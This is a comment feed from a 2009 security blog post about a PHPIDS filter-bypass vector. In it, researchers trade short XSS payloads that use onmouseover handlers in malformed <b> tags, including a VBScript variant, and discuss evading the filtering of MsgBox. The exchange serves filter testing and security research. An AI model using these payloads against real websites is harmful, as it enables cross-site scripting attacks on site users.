Comments on: New PHPIDS vector http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/ Javascript blog with messed up syntax inside Thu, 26 Jan 2012 01:38:34 +0000 hourly 1 By: wheelq http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1570 wheelq Mon, 15 Jun 2009 11:37:00 +0000 http://www.thespanner.co.uk/?p=432#comment-1570 sorry my bad, wrong interpretation ;) sorry my bad, wrong interpretation ;)

]]> By: wheelq http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1569 wheelq Mon, 15 Jun 2009 11:25:17 +0000 http://www.thespanner.co.uk/?p=432#comment-1569 shorter- <b/alt="1"onmouseover=alert(1)>test</b> shorter- <b/alt=”1″onmouseover=alert(1)>test</b>

]]> By: wheelq http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1568 wheelq Mon, 15 Jun 2009 11:23:53 +0000 http://www.thespanner.co.uk/?p=432#comment-1568 works also on FF 3.0.11 <b/alt=”1″onmouseover=alert(1) language=VBS>test</b> works also on FF 3.0.11
<b/alt=”1″onmouseover=alert(1) language=VBS>test</b>

]]> By: whelq http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1567 whelq Mon, 15 Jun 2009 11:23:33 +0000 http://www.thespanner.co.uk/?p=432#comment-1567 works also on FF 3.0.11 <b/alt="1"onmouseover=alert(1) language=VBS>test</b> works also on FF 3.0.11

<b/alt=”1″onmouseover=alert(1) language=VBS>test</b>

]]> By: Gareth Heyes http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1561 Gareth Heyes Mon, 01 Jun 2009 13:56:30 +0000 http://www.thespanner.co.uk/?p=432#comment-1561 @Thornmaker Thanks :) MsgBox could be used, it would require some filter evasion though because MsgBox is filtered. You could use chr function combined with GetRef to insert a payload in the dom. Or tricks like this:- <b/alt=""onmouseover= MsgBox"XSS" language=vbs>test</b> @Thornmaker

Thanks :)

MsgBox could be used, it would require some filter evasion though because MsgBox is filtered. You could use chr function combined with GetRef to insert a payload in the dom. Or tricks like this:-

<b/alt=”"onmouseover= MsgBox”XSS" language=vbs>test</b>

]]> By: thornmaker http://www.thespanner.co.uk/2009/06/01/new-phpids-vector/#comment-1560 thornmaker Mon, 01 Jun 2009 13:36:52 +0000 http://www.thespanner.co.uk/?p=432#comment-1560 awesome! what is needed to avoid the scripted window dialog? awesome! what is needed to avoid the scripted window dialog?

]]>